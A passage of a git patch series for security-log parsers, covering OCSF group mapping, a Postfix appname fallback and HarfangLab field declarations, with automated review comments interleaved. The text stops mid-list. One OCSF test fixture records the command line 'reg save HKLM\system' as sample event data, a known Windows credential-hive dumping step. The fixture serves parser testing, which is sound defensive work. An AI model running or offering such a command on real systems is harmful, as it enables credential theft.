@@ -307,15 +307,20 @@ stages: {%- for item in parse_event.message.actor.process.file.hashes -%}{%- if item.algorithm == 'TLSH' -%}{{ item.value }}{%- endif -%}{%- endfor -%} - set: - process.group.id: - - "{{ parse_event.message.actor.process.egid }}" + ocsf.process.group: > + { + 'id': '{{ parse_event.message.actor.process.egid }}', + 'name': '{{ parse_event.message.actor.process.group.name }}' + } filter: "{{ parse_event.message.actor.process.get('egid') != None }}" - set: - process.group.id: - - "{{ parse_event.message.actor.process.group.uid }}" + ocsf.process.group: > + { + 'id': '{{ parse_event.message.actor.process.group.uid }}', + 'name': '{{ parse_event.message.actor.process.group.name }}' + } filter: "{{ parse_event.message.actor.process.group.get('uid') != None }}" - set: - process.group.name: "{{ parse_event.message.actor.process.group.name }}" process.name: "{{ parse_event.message.actor.process.name }}" process.pid: "{{ parse_event.message.actor.process.pid }}" process.start: "{{ parse_event.message.actor.process.created_time | to_rfc3339 }}" 
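Review bot: `ocsf.process.group` is assembled as a hand-quoted pseudo-literal (`'id': '{{ ... }}'`) with the values interpolated unescaped, so a group name containing a quote breaks the literal, and when `group.name` is absent the result is `'name': ''` rather than an omitted key. The element key also differs from the one used for `ocsf.process.user.groups` in the next hunk (`id` here, `uid` there), and the @@ -602 hunk writes the same structure with double quotes while the other three use single quotes — pick one key name and one quoting style. If the engine supports Jinja `set` with dict literals, building the object that way and emitting it with `| tojson` avoids the hand quoting entirely. The same construction recurs in the @@ -366, @@ -602 and @@ -628 hunks.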
@@ -333,17 +338,27 @@ stages: - "{{ parse_event.message.actor.process.user.uid }}" filter: "{{ parse_event.message.actor.process.user.get('uid') != None }}" - set: - process.user.group.id: > - [{%- for item in parse_event.message.actor.process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] - - process.user.group.name: > - [{%- for item in parse_event.message.actor.process.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}] - - process.parent.user.group.id: > - [{%- for item in parse_event.message.actor.process.parent_process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] - - process.parent.user.group.name: > - [{%- for item in parse_event.message.actor.process.parent_process.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}] + ocsf.process.user.groups: > + [ + {%- for item in parse_event.message.actor.process.user.groups -%} + { + {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%} + {%- if item.name -%}'name': '{{item.name}}',{%- endif -%} + }, + {%- endfor -%} + ] + filter: "{{parse_event.message.actor.process.user.get('groups') != None}}" + - set: + ocsf.process.parent.user.groups: > + [ + {%- for item in parse_event.message.actor.process.parent_process.user.groups -%} + { + {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%} + {%- if item.name -%}'name': '{{item.name}}',{%- endif -%} + }, + {%- endfor -%} + ] + filter: "{{parse_event.message.actor.process.parent_process.user.get('groups') != None}}" - set: process.user.name: "{{ parse_event.message.actor.process.user.name }}" 
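Review bot: `{%- if item.uid -%}` tests truthiness, so a group uid arriving as the integer `0` is silently dropped and the element is emitted as `{}`; if OCSF delivers `uid` as a string this does not bite today, but `{%- if item.uid is not none -%}` states the intent without depending on that. Each element also keeps a trailing comma inside the braces and after the closing brace, which only parses if the template output is evaluated as a Python literal rather than JSON — a one-line comment above the `>` block saying which it is would spare the next reader the guess. The same construction appears in the @@ -628 and @@ -666 hunks.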
@@ -366,15 +381,20 @@ stages: ] filter: "{{parse_event.message.actor.user.get('groups') != None}}" - set: - process.parent.group.id: - - "{{ parse_event.message.actor.process.parent_process.egid }}" + ocsf.process.parent.group: > + { + 'id': '{{ parse_event.message.actor.process.parent_process.egid }}', + 'name': '{{ parse_event.message.actor.process.parent_process.group.name }}' + } filter: "{{ parse_event.message.actor.process.parent_process.get('egid') != None }}" - set: - process.parent.group.id: - - "{{ parse_event.message.actor.process.parent_process.group.uid }}" + ocsf.process.parent.group: > + { + 'id': '{{ parse_event.message.actor.process.parent_process.group.uid }}', + 'name': '{{ parse_event.message.actor.process.parent_process.group.name }}' + } filter: "{{ parse_event.message.actor.process.parent_process.group.get('uid') != None }}" - set: - process.parent.group.name: "{{ parse_event.message.actor.process.parent_process.group.name }}" process.parent.name: "{{ parse_event.message.actor.process.parent_process.name }}" process.parent.pid: "{{ parse_event.message.actor.process.parent_process.pid }}" process.parent.start: "{{ parse_event.message.actor.process.parent_process.created_time | to_rfc3339 }}" 
@@ -602,15 +622,20 @@ stages: {%- for item in parse_event.message.process.file.hashes -%}{%- if item.algorithm == 'TLSH' -%}{{ item.value }}{%- endif -%}{%- endfor -%} - set: - process.group.id: - - "{{ parse_event.message.process.egid }}" + ocsf.process.group: > + { + "id": "{{ parse_event.message.process.egid }}", + "name": "{{ parse_event.message.process.group.name }}" + } filter: "{{ parse_event.message.process.get('egid') != None }}" - set: - process.group.id: - - "{{ parse_event.message.process.group.uid }}" + ocsf.process.group: > + { + "id": "{{ parse_event.message.process.group.uid }}", + "name": "{{ parse_event.message.process.group.name }}" + } filter: "{{ parse_event.message.process.group.get('uid') != None }}" - set: - process.group.name: "{{ parse_event.message.process.group.name }}" process.name: "{{ parse_event.message.process.name }}" process.pid: "{{ parse_event.message.process.pid }}" process.start: "{{ parse_event.message.process.created_time | to_rfc3339 }}" 
@@ -628,25 +653,35 @@ stages: - "{{ parse_event.message.process.user.uid }}" filter: "{{ parse_event.message.process.user.get('uid') != None }}" - set: - process.user.group.id: > - [{%- for item in parse_event.message.process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] - process.user.group.name: > - [{%- for item in parse_event.message.process.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}] - + ocsf.process.user.groups: > + [ + {%- for item in parse_event.message.process.user.groups -%} + { + {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%} + {%- if item.name -%}'name': '{{item.name}}',{%- endif -%} + }, + {%- endfor -%} + ] + filter: "{{parse_event.message.process.user.get('groups') != None}}" - set: process.user.name: "{{ parse_event.message.process.user.name }}" process.parent.command_line: "{{ parse_event.message.process.parent_process.cmd_line }}" process.parent.end: "{{ parse_event.message.process.parent_process.terminated_time | to_rfc3339 }}" - set: - process.parent.group.id: - - "{{ parse_event.message.process.parent_process.egid }}" + ocsf.process.parent.group: > + { + 'id': '{{ parse_event.message.process.parent_process.egid }}', + 'name': '{{ parse_event.message.process.parent_process.group.name }}' + } filter: "{{ parse_event.message.process.parent_process.get('egid') != None }}" - set: - process.parent.group.id: - - "{{ parse_event.message.process.parent_process.group.uid }}" + ocsf.process.parent.group: > + { + 'id': '{{ parse_event.message.process.parent_process.group.uid }}', + 'name': '{{ parse_event.message.process.parent_process.group.name }}' + } filter: "{{ parse_event.message.process.parent_process.group.get('uid') != None }}" - set: - process.parent.group.name: "{{ parse_event.message.process.parent_process.group.name }}" process.parent.name: "{{ parse_event.message.process.parent_process.name }}" process.parent.pid: "{{ parse_event.message.process.parent_process.pid }}" 
process.parent.start: "{{ parse_event.message.process.parent_process.created_time | to_rfc3339 }}" @@ -666,10 +701,16 @@ stages: - set: process.parent.user.name: "{{ parse_event.message.process.parent_process.user.name }}" - set: - process.parent.user.group.id: > - [{%- for item in parse_event.message.process.parent_process.user.groups -%}{%- if item.uid -%}'{{item.uid}}',{%- endif -%}{%- endfor -%}] - process.parent.user.group.name: > - [{%- for item in parse_event.message.process.parent_process.user.groups -%}{%- if item.name -%}'{{item.name}}',{%- endif -%}{%- endfor -%}] + ocsf.process.parent.user.groups: > + [ + {%- for item in parse_event.message.process.parent_process.user.groups -%} + { + {%- if item.uid -%}'uid': '{{item.uid}}',{%- endif -%} + {%- if item.name -%}'name': '{{item.name}}',{%- endif -%} + }, + {%- endfor -%} + ] + filter: "{{parse_event.message.process.parent_process.user.get('groups') != None}}" pipeline_object_proxy: actions: [] diff --git a/OCSF/ocsf/tests/test_process_activity_1.json b/OCSF/ocsf/tests/test_process_activity_1.json index a3ec8acfe..418f30560 100644 --- a/OCSF/ocsf/tests/test_process_activity_1.json +++ b/OCSF/ocsf/tests/test_process_activity_1.json @@ -44,10 +44,6 @@ "command_line": "reg save HKLM\\system C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\system ", "pid": 4696, "user": { - "group": { - "id": [], - "name": [] - }, "id": [ "NULL SID" ] From 66cca3dea4a29461f0db1db70a7e38c04455632d Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Tue, 17 Sep 2024 18:38:05 +0200 Subject: [PATCH 051/317] fix(OCSF): apply linter --- OCSF/ocsf/_meta/fields.yml | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/OCSF/ocsf/_meta/fields.yml b/OCSF/ocsf/_meta/fields.yml index 532291fd9..cf1b560dd 100644 --- a/OCSF/ocsf/_meta/fields.yml +++ b/OCSF/ocsf/_meta/fields.yml 
@@ -20,16 +20,6 @@ ocsf.class_uid: name: ocsf.class_uid type: long -ocsf.user.groups: - description: The list of groups that the user belong to - name: ocsf.user.groups - type: array - -ocsf.vulnerabilities: - description: '' - name: ocsf.vulnerabilities - type: array - ocsf.process.group: description: '' name: ocsf.process.group @@ -79,3 +69,13 @@ ocsf.process.user.groups: description: '' name: ocsf.process.user.groups type: array + +ocsf.user.groups: + description: The list of groups that the user belong to + name: ocsf.user.groups + type: array + +ocsf.vulnerabilities: + description: '' + name: ocsf.vulnerabilities + type: array From 23c2cea3bf883a9754241a2ee22c2478f841575a Mon Sep 17 00:00:00 2001 From: Clement Lyonnet Date: Wed, 18 Sep 2024 10:09:36 +0200 Subject: [PATCH 052/317] new CHANGELOG file --- GateWatcher/aioniq_ecs/CHANGELOG.md | 7 +++++++ 1 file changed, 7 insertions(+) create mode 100644 GateWatcher/aioniq_ecs/CHANGELOG.md diff --git a/GateWatcher/aioniq_ecs/CHANGELOG.md b/GateWatcher/aioniq_ecs/CHANGELOG.md new file mode 100644 index 000000000..66b10dc08 --- /dev/null +++ b/GateWatcher/aioniq_ecs/CHANGELOG.md @@ -0,0 +1,7 @@ +# Gatewatcher ECS parser for sekoia + +This format parse ECS logs exported from the GCenter (version v103+). + +# Versions + +- 1.0.0: initial release From 5d874082b94985df51dc17b1c14e7f1dd844a03e Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia <135212489+lvoloshyn-sekoia@users.noreply.github.com> Date: Wed, 18 Sep 2024 12:42:28 +0300 Subject: [PATCH 053/317] Update 1Password/1password-epm/_meta/manifest.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- 1Password/1password-epm/_meta/manifest.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/1Password/1password-epm/_meta/manifest.yml b/1Password/1password-epm/_meta/manifest.yml index f2f07105a..0ea782184 100644 --- a/1Password/1password-epm/_meta/manifest.yml 
+++ b/1Password/1password-epm/_meta/manifest.yml @@ -1,5 +1,5 @@ uuid: 09754cc4-e247-4712-9a76-25529ba11b8b -name: 1Password EPM +name: 1Password EPM [BETA] slug: one-password-epm automation_connector_uuid: f3330ea4-e492-4c57-9764-d2dcf1d044eb automation_module_uuid: 56f9e1f6-95ba-45ed-867b-44fb3183934d From 66920f4a27c2915ef7c87a5b556162c48873869c Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 18 Sep 2024 14:17:04 +0200 Subject: [PATCH 054/317] fix(Postfix): handle when log.syslog.appname is empty or equals to the dash --- Postfix/postfix/ingest/parser.yml | 4 ++-- Postfix/postfix/tests/local5.json | 4 ++-- Postfix/postfix/tests/smtp3.json | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/Postfix/postfix/ingest/parser.yml b/Postfix/postfix/ingest/parser.yml index 0bd42a44a..e2982cf2b 100644 --- a/Postfix/postfix/ingest/parser.yml +++ b/Postfix/postfix/ingest/parser.yml @@ -7,7 +7,7 @@ pipeline: properties: input_field: "{{original.message}}" output_field: message - pattern_key: "{{original.get('log', {}).get('syslog', {}).get('appname', 'default')}}" + pattern_key: "{{original.get('log', {}).get('syslog', {}).get('appname') or '-'}}" patterns: "postfix/smtp": "%{POSTFIX_SMTP}" "postfix/smtpd": "%{CASE_POSTFIX_SMTPD}" @@ -27,7 +27,7 @@ pipeline: "postfix/anvil": "%{POSTFIX_ANVIL}" "postfix/pickup": "%{POSTFIX_PICKUP}" "postfix": "%{POSTFIX}" - "default": "%{POSTFIX_POSTGREY}|%{POSTFIX}|%{SPAMD}|%{POSTFIX_POLCY_SPF}|%{POSTFIX_CLEANUP}|%{POSTFIX_QMGR}|%{POSTFIX_SMTPD}" + "-": "%{POSTFIX_POSTGREY}|%{POSTFIX}|%{SPAMD}|%{POSTFIX_POLCY_SPF}|%{POSTFIX_CLEANUP}|%{POSTFIX_QMGR}|%{POSTFIX_SMTPD}" custom_patterns: CASE_POSTFIX_LOCAL: "%{POSTFIX_SMTP_RELAY}|%{POSTFIX_KEYVALUE}|%{POSTFIX_WARNING}" diff --git a/Postfix/postfix/tests/local5.json b/Postfix/postfix/tests/local5.json index 664aebf05..047459b1a 100644 --- a/Postfix/postfix/tests/local5.json +++ b/Postfix/postfix/tests/local5.json 
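Review bot: The new `pattern_key` falls back to `-` only when `appname` is missing or empty, so a present appname with no entry in `patterns` (another program sharing the syslog stream) still selects no pattern, exactly as with the former `default` key; if that is intended, a short comment next to the `"-"` pattern saying that unknown appnames are left unparsed would document it. The local5.json and smtp3.json fixtures on the next line are edited in place to the empty and dash appname rather than duplicated, so the `postfix/local` and `postfix/smtp` keys appear to lose their exercised cases; adding fixtures instead of changing them keeps both code paths covered.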
@@ -3,7 +3,7 @@ "message": "B84078B26C7: to=proxy@example.localdomain, orig_to=sample.orig.to, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", "log": { "syslog": { - "appname": "postfix/local" + "appname": "" } } }, @@ -37,7 +37,7 @@ }, "log": { "syslog": { - "appname": "postfix/local" + "appname": "" } }, "network": { diff --git a/Postfix/postfix/tests/smtp3.json b/Postfix/postfix/tests/smtp3.json index d6cc4267e..24f51985b 100644 --- a/Postfix/postfix/tests/smtp3.json +++ b/Postfix/postfix/tests/smtp3.json @@ -3,7 +3,7 @@ "message": "7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17)", "log": { "syslog": { - "appname": "postfix/smtp" + "appname": "-" } } }, @@ -39,7 +39,7 @@ }, "log": { "syslog": { - "appname": "postfix/smtp" + "appname": "-" } }, "network": { From ba0223ec41286874321b03d1a084fb1b2c3caedd Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 18 Sep 2024 15:41:48 +0200 Subject: [PATCH 055/317] fix(Harfanglab): declare the action.properties.* fields to set --- HarfangLab/harfanglab/_meta/fields.yml | 868 +++++++++++++++++- HarfangLab/harfanglab/ingest/parser.yml | 178 +++- HarfangLab/harfanglab/tests/test_bug.json | 4 - .../harfanglab/tests/wineeventlog-event.json | 11 +- HarfangLab/harfanglab/tests/wineventlog2.json | 9 +- HarfangLab/harfanglab/tests/wineventlog3.json | 69 +- HarfangLab/harfanglab/tests/wineventlog4.json | 2 - 7 files changed, 1070 insertions(+), 71 deletions(-) diff --git a/HarfangLab/harfanglab/_meta/fields.yml b/HarfangLab/harfanglab/_meta/fields.yml index fe23cec7b..aded5e2de 100644 --- a/HarfangLab/harfanglab/_meta/fields.yml +++ b/HarfangLab/harfanglab/_meta/fields.yml 
@@ -1,12 +1,506 @@ -action.properties: - description: 'A detailed set of attributes associated with a specific action, typically - involving user authentication or a network event. It contains the following keys:' - name: action.properties - type: object +action.properties.ASsecurityintelligencecreationtime: + description: '' + name: action.properties.ASsecurityintelligencecreationtime + type: keyword + +action.properties.ASsecurityintelligenceversion: + description: '' + name: action.properties.ASsecurityintelligenceversion + type: keyword + +action.properties.AVsecurityintelligencecreationtime: + description: '' + name: action.properties.AVsecurityintelligencecreationtime + type: keyword + +action.properties.AVsecurityintelligenceversion: + description: '' + name: action.properties.AVsecurityintelligenceversion + type: keyword + +action.properties.AccessList: + description: '' + name: action.properties.AccessList + type: keyword + +action.properties.AccessMask: + description: '' + name: action.properties.AccessMask + type: keyword + +action.properties.AccessReason: + description: '' + name: action.properties.AccessReason + type: keyword + +action.properties.ActionID: + description: '' + name: action.properties.ActionID + type: keyword + +action.properties.ActionName: + description: '' + name: action.properties.ActionName + type: keyword + +action.properties.AdditionalActionsID: + description: '' + name: action.properties.AdditionalActionsID + type: keyword + +action.properties.AdditionalActionsString: + description: '' + name: action.properties.AdditionalActionsString + type: keyword + +action.properties.AuthenticationPackageName: + description: '' + name: action.properties.AuthenticationPackageName + type: keyword + +action.properties.BMstate: + description: '' + name: action.properties.BMstate + type: keyword + +action.properties.CacheState: + description: '' + name: action.properties.CacheState + type: keyword + +action.properties.CallerProcessId: + 
description: '' + name: action.properties.CallerProcessId + type: keyword + +action.properties.CallerProcessName: + description: '' + name: action.properties.CallerProcessName + type: keyword + +action.properties.CategoryID: + description: '' + name: action.properties.CategoryID + type: keyword + +action.properties.CategoryName: + description: '' + name: action.properties.CategoryName + type: keyword + +action.properties.ClientProcessId: + description: '' + name: action.properties.ClientProcessId + type: keyword + +action.properties.ClientProcessStartKey: + description: '' + name: action.properties.ClientProcessStartKey + type: keyword + +action.properties.DetectionID: + description: '' + name: action.properties.DetectionID + type: keyword + +action.properties.DetectionTime: + description: '' + name: action.properties.DetectionTime + type: keyword + +action.properties.DetectionUser: + description: '' + name: action.properties.DetectionUser + type: keyword + +action.properties.ElevatedToken: + description: '' + name: action.properties.ElevatedToken + type: keyword + +action.properties.EngineVersion: + description: '' + name: action.properties.EngineVersion + type: keyword + +action.properties.Engineup-to-date: + description: '' + name: action.properties.Engineup-to-date + type: keyword + +action.properties.Engineversion: + description: '' + name: action.properties.Engineversion + type: keyword + +action.properties.ErrorCode: + description: '' + name: action.properties.ErrorCode + type: keyword + +action.properties.ErrorDescription: + description: '' + name: action.properties.ErrorDescription + type: keyword + +action.properties.ExecutionID: + description: '' + name: action.properties.ExecutionID + type: keyword + +action.properties.ExecutionName: + description: '' + name: action.properties.ExecutionName + type: keyword + +action.properties.FQDN: + description: '' + name: action.properties.FQDN + type: keyword + +action.properties.FWLink: + description: '' + name: 
action.properties.FWLink + type: keyword + +action.properties.FailureReason: + description: '' + name: action.properties.FailureReason + type: keyword + +action.properties.FileNameBuffer: + description: '' + name: action.properties.FileNameBuffer + type: keyword + +action.properties.FileNameLength: + description: '' + name: action.properties.FileNameLength + type: keyword + +action.properties.Flags: + description: '' + name: action.properties.Flags + type: keyword + +action.properties.Hash: + description: '' + name: action.properties.Hash + type: keyword + +action.properties.HashSize: + description: '' + name: action.properties.HashSize + type: keyword + +action.properties.IOAVstate: + description: '' + name: action.properties.IOAVstate + type: keyword + +action.properties.ImpersonationLevel: + description: '' + name: action.properties.ImpersonationLevel + type: keyword + +action.properties.IpAddress: + description: '' + name: action.properties.IpAddress + type: keyword + +action.properties.IpPort: + description: '' + name: action.properties.IpPort + type: keyword + +action.properties.IssuerName: + description: '' + name: action.properties.IssuerName + type: keyword + +action.properties.IssuerNameLength: + description: '' + name: action.properties.IssuerNameLength + type: keyword + +action.properties.IssuerTBSHash: + description: '' + name: action.properties.IssuerTBSHash + type: keyword + +action.properties.IssuerTBSHashSize: + description: '' + name: action.properties.IssuerTBSHashSize + type: keyword + +action.properties.KeyLength: + description: '' + name: action.properties.KeyLength + type: keyword + +action.properties.LastASsecurityintelligenceage: + description: '' + name: action.properties.LastASsecurityintelligenceage + type: keyword + +action.properties.LastAVsecurityintelligenceage: + description: '' + name: action.properties.LastAVsecurityintelligenceage + type: keyword + +action.properties.Lastfullscanage: + description: '' + name: 
action.properties.Lastfullscanage + type: keyword + +action.properties.Lastfullscanendtime: + description: '' + name: action.properties.Lastfullscanendtime + type: keyword + +action.properties.Lastfullscansource: + description: '' + name: action.properties.Lastfullscansource + type: keyword + +action.properties.Lastfullscanstarttime: + description: '' + name: action.properties.Lastfullscanstarttime + type: keyword + +action.properties.Lastquickscanage: + description: '' + name: action.properties.Lastquickscanage + type: keyword + +action.properties.Lastquickscanendtime: + description: '' + name: action.properties.Lastquickscanendtime + type: keyword + +action.properties.Lastquickscansource: + description: '' + name: action.properties.Lastquickscansource + type: keyword + +action.properties.Lastquickscanstarttime: + description: '' + name: action.properties.Lastquickscanstarttime + type: keyword + +action.properties.Latestengineversion: + description: '' + name: action.properties.Latestengineversion + type: keyword + +action.properties.Latestplatformversion: + description: '' + name: action.properties.Latestplatformversion + type: keyword + +action.properties.LmPackageName: + description: '' + name: action.properties.LmPackageName + type: keyword + +action.properties.LogonGuid: + description: '' + name: action.properties.LogonGuid + type: keyword + +action.properties.LogonProcessName: + description: '' + name: action.properties.LogonProcessName + type: keyword + +action.properties.LogonType: + description: '' + name: action.properties.LogonType + type: keyword + +action.properties.NRIengineversion: + description: '' + name: action.properties.NRIengineversion + type: keyword + +action.properties.NRIsecurityintelligenceversion: + description: '' + name: action.properties.NRIsecurityintelligenceversion + type: keyword + +action.properties.NotValidAfter: + description: '' + name: action.properties.NotValidAfter + type: keyword + +action.properties.NotValidBefore: + 
description: '' + name: action.properties.NotValidBefore + type: keyword + +action.properties.OAstate: + description: '' + name: action.properties.OAstate + type: keyword + +action.properties.ObjectType: + description: '' + name: action.properties.ObjectType + type: keyword + +action.properties.OriginID: + description: '' + name: action.properties.OriginID + type: keyword + +action.properties.OriginName: + description: '' + name: action.properties.OriginName + type: keyword + +action.properties.PageHash: + description: '' + name: action.properties.PageHash + type: keyword + +action.properties.ParentProcessId: + description: '' + name: action.properties.ParentProcessId + type: keyword + +action.properties.Path: + description: '' + name: action.properties.Path + type: keyword + +action.properties.Platformup-to-date: + description: '' + name: action.properties.Platformup-to-date + type: keyword + +action.properties.Platformversion: + description: '' + name: action.properties.Platformversion + type: keyword + +action.properties.PolicyBits: + description: '' + name: action.properties.PolicyBits + type: keyword + +action.properties.PostCleanStatus: + description: '' + name: action.properties.PostCleanStatus + type: keyword + +action.properties.PreExecutionStatus: + description: '' + name: action.properties.PreExecutionStatus + type: keyword + +action.properties.ProcessId: + description: '' + name: action.properties.ProcessId + type: keyword + +action.properties.ProcessName: + description: '' + name: action.properties.ProcessName + type: keyword + +action.properties.ProcessNameBuffer: + description: '' + name: action.properties.ProcessNameBuffer + type: keyword + +action.properties.ProcessNameLength: + description: '' + name: action.properties.ProcessNameLength + type: keyword + +action.properties.ProductName: + description: '' + name: action.properties.ProductName + type: keyword + +action.properties.ProductVersion: + description: '' + name: 
action.properties.ProductVersion + type: keyword + +action.properties.Productstatus: + description: '' + name: action.properties.Productstatus + type: keyword + +action.properties.ProfileChanged: + description: '' + name: action.properties.ProfileChanged + type: keyword -action.properties.Path: +action.properties.PublisherName: description: '' - name: action.properties.Path + name: action.properties.PublisherName + type: keyword + +action.properties.PublisherNameLength: + description: '' + name: action.properties.PublisherNameLength + type: keyword + +action.properties.PublisherTBSHash: + description: '' + name: action.properties.PublisherTBSHash + type: keyword + +action.properties.PublisherTBSHashSize: + description: '' + name: action.properties.PublisherTBSHashSize + type: keyword + +action.properties.RTPstate: + description: '' + name: action.properties.RTPstate + type: keyword + +action.properties.RelativeTargetName: + description: '' + name: action.properties.RelativeTargetName + type: keyword + +action.properties.RemediationUser: + description: '' + name: action.properties.RemediationUser + type: keyword + +action.properties.RequestedPolicy: + description: '' + name: action.properties.RequestedPolicy + type: keyword + +action.properties.RequestedSigningLevel: + description: '' + name: action.properties.RequestedSigningLevel + type: keyword + +action.properties.RestrictedAdminMode: + description: '' + name: action.properties.RestrictedAdminMode + type: keyword + +action.properties.RpcCallClientLocality: + description: '' + name: action.properties.RpcCallClientLocality + type: keyword + +action.properties.RuleId: + description: '' + name: action.properties.RuleId + type: keyword + +action.properties.RuleName: + description: '' + name: action.properties.RuleName type: keyword action.properties.ScriptBlockText: 
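Review bot: Every field declaration added in this hunk carries `description: ''`, and the same holds for the `@@ -14,6 +508,161 @@` and `@@ -24,6 +673,211 @@` hunks, so the generated field reference says nothing about roughly 180 fields, including the ones an analyst pivots on during an investigation (`LogonType`, `ElevatedToken`, `TargetUserSid`, `AccessMask`). Several names differ from one another only by spacing or case of the source key, as the parser.yml hunk in this commit shows (`Engineversion` from `Engine version`, `EngineVersion` from `Engine Version`), so at minimum each description should name the originating event_data key, e.g. `description: Value of the Windows event_data key "Engine version"`. The hyphen in `action.properties.Engineup-to-date` and `action.properties.Platformup-to-date` is unusual in a field name and is worth a second look before it is frozen into the schema and downstream queries.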
@@ -14,6 +508,161 @@ action.properties.ScriptBlockText: name: action.properties.ScriptBlockText type: keyword +action.properties.SecureRequired: + description: '' + name: action.properties.SecureRequired + type: keyword + +action.properties.SecurityintelligenceVersion: + description: '' + name: action.properties.SecurityintelligenceVersion + type: keyword + +action.properties.SeverityID: + description: '' + name: action.properties.SeverityID + type: keyword + +action.properties.SeverityName: + description: '' + name: action.properties.SeverityName + type: keyword + +action.properties.ShareLocalPath: + description: '' + name: action.properties.ShareLocalPath + type: keyword + +action.properties.ShareName: + description: '' + name: action.properties.ShareName + type: keyword + +action.properties.Signature: + description: '' + name: action.properties.Signature + type: keyword + +action.properties.SignatureType: + description: '' + name: action.properties.SignatureType + type: keyword + +action.properties.SourceID: + description: '' + name: action.properties.SourceID + type: keyword + +action.properties.SourceName: + description: '' + name: action.properties.SourceName + type: keyword + +action.properties.State: + description: '' + name: action.properties.State + type: keyword + +action.properties.Status: + description: '' + name: action.properties.Status + type: keyword + +action.properties.StatusCode: + description: '' + name: action.properties.StatusCode + type: keyword + +action.properties.StatusDescription: + description: '' + name: action.properties.StatusDescription + type: keyword + +action.properties.SubStatus: + description: '' + name: action.properties.SubStatus + type: keyword + +action.properties.SubjectDomainName: + description: '' + name: action.properties.SubjectDomainName + type: keyword + +action.properties.SubjectLogonId: + description: '' + name: action.properties.SubjectLogonId + type: keyword + +action.properties.SubjectUserName: + description: '' 
+ name: action.properties.SubjectUserName + type: keyword + +action.properties.SubjectUserSid: + description: '' + name: action.properties.SubjectUserSid + type: keyword + +action.properties.TargetDomainName: + description: '' + name: action.properties.TargetDomainName + type: keyword + +action.properties.TargetInfo: + description: '' + name: action.properties.TargetInfo + type: keyword + +action.properties.TargetLinkedLogonId: + description: '' + name: action.properties.TargetLinkedLogonId + type: keyword + +action.properties.TargetLogonGuid: + description: '' + name: action.properties.TargetLogonGuid + type: keyword + +action.properties.TargetLogonId: + description: '' + name: action.properties.TargetLogonId + type: keyword + +action.properties.TargetOutboundDomainName: + description: '' + name: action.properties.TargetOutboundDomainName + type: keyword + +action.properties.TargetOutboundUserName: + description: '' + name: action.properties.TargetOutboundUserName + type: keyword + +action.properties.TargetServerName: + description: '' + name: action.properties.TargetServerName + type: keyword + +action.properties.TargetSid: + description: '' + name: action.properties.TargetSid + type: keyword + +action.properties.TargetUserName: + description: '' + name: action.properties.TargetUserName + type: keyword + +action.properties.TargetUserSid: + description: '' + name: action.properties.TargetUserSid + type: keyword + +action.properties.TaskContent: + description: '' + name: action.properties.TaskContent + type: keyword + action.properties.TaskContentNew_Args: description: '' name: action.properties.TaskContentNew_Args 
@@ -24,6 +673,211 @@ action.properties.TaskContentNew_Command: name: action.properties.TaskContentNew_Command type: keyword +action.properties.TaskName: + description: '' + name: action.properties.TaskName + type: keyword + +action.properties.ThreatID: + description: '' + name: action.properties.ThreatID + type: keyword + +action.properties.ThreatName: + description: '' + name: action.properties.ThreatName + type: keyword + +action.properties.TotalSignatureCount: + description: '' + name: action.properties.TotalSignatureCount + type: keyword + +action.properties.TransmittedServices: + description: '' + name: action.properties.TransmittedServices + type: keyword + +action.properties.TypeID: + description: '' + name: action.properties.TypeID + type: keyword + +action.properties.TypeName: + description: '' + name: action.properties.TypeName + type: keyword + +action.properties.Unused: + description: '' + name: action.properties.Unused + type: keyword + +action.properties.Unused2: + description: '' + name: action.properties.Unused2 + type: keyword + +action.properties.Unused3: + description: '' + name: action.properties.Unused3 + type: keyword + +action.properties.Unused4: + description: '' + name: action.properties.Unused4 + type: keyword + +action.properties.Unused5: + description: '' + name: action.properties.Unused5 + type: keyword + +action.properties.Unused6: + description: '' + name: action.properties.Unused6 + type: keyword + +action.properties.ValidatedPolicy: + description: '' + name: action.properties.ValidatedPolicy + type: keyword + +action.properties.ValidatedSigningLevel: + description: '' + name: action.properties.ValidatedSigningLevel + type: keyword + +action.properties.VerificationError: + description: '' + name: action.properties.VerificationError + type: keyword + +action.properties.VirtualAccount: + description: '' + name: action.properties.VirtualAccount + type: keyword + +action.properties.WorkstationName: + description: '' + name: 
action.properties.WorkstationName + type: keyword + +action.properties.param0: + description: '' + name: action.properties.param0 + type: keyword + +action.properties.param1: + description: '' + name: action.properties.param1 + type: keyword + +action.properties.param10: + description: '' + name: action.properties.param10 + type: keyword + +action.properties.param11: + description: '' + name: action.properties.param11 + type: keyword + +action.properties.param12: + description: '' + name: action.properties.param12 + type: keyword + +action.properties.param13: + description: '' + name: action.properties.param13 + type: keyword + +action.properties.param14: + description: '' + name: action.properties.param14 + type: keyword + +action.properties.param15: + description: '' + name: action.properties.param15 + type: keyword + +action.properties.param16: + description: '' + name: action.properties.param16 + type: keyword + +action.properties.param17: + description: '' + name: action.properties.param17 + type: keyword + +action.properties.param18: + description: '' + name: action.properties.param18 + type: keyword + +action.properties.param19: + description: '' + name: action.properties.param19 + type: keyword + +action.properties.param2: + description: '' + name: action.properties.param2 + type: keyword + +action.properties.param20: + 